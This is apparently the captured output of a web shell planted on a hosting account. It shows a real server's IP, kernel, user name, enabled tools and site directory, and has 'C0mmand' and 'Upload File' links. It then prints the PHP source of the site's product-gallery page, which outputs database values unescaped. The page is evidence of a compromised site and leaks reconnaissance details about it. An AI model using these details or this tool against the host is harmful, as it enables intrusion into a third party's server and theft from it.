Server IP : 103.53.40.154 / Your IP : 3.133.157.231 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/milkodelight.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<section class="bd-gallery__area gallery__overlay fix pt-20 pb-60"> <div class="bd-gallery__bg"> <img src="assets/img/bg/gallery-bg.png" alt="gallery-bg"> </div> <div class="container"> <div class="row"> <div class="col-12"> <div class="bd-gallery__inner p-relative"> <div class="bd-section__title-wrapper mb-45"> <span class="bd-sub__title">Milko Delight</span> <h2 class="bd-section__title">Product gallery</h2> </div> <!-- If we need navigation buttons --> <div class="bd-gallery__navigatin"> <button class="gallery-button-prev"><i class="far fa-long-arrow-left"></i></button> <button class="gallery-button-next"><i class="far fa-long-arrow-right"></i></button> </div> </div> </div> </div> <div class="row"> <div class="col-12"> <div class="bd-gallery__wrapper"> <div class="bd-gallery-active swiper-container"> <div class="swiper-wrapper"> <?php $sql = "SELECT * FROM `tbl_gallery`"; $run = mysqli_query($db,$sql) or die("Query Not run"); while($data = mysqli_fetch_assoc($run)){ ?> <div class="swiper-slide"> <div class="bd-gallery__item"> <div class="bd-gallery__image w-img"> <img width="100%" src="<?php echo $wspath?>admin/images/gallery/<?php echo $data['image']?>" alt="gallery-image"> </div> <div class="bd-gallery__content"> <h5><a href="gallery.html"><?php echo $data['title']?></a></h5> </div> </div> </div> <?php } ?> </div> </div> </div> </div> </div> </div> </section>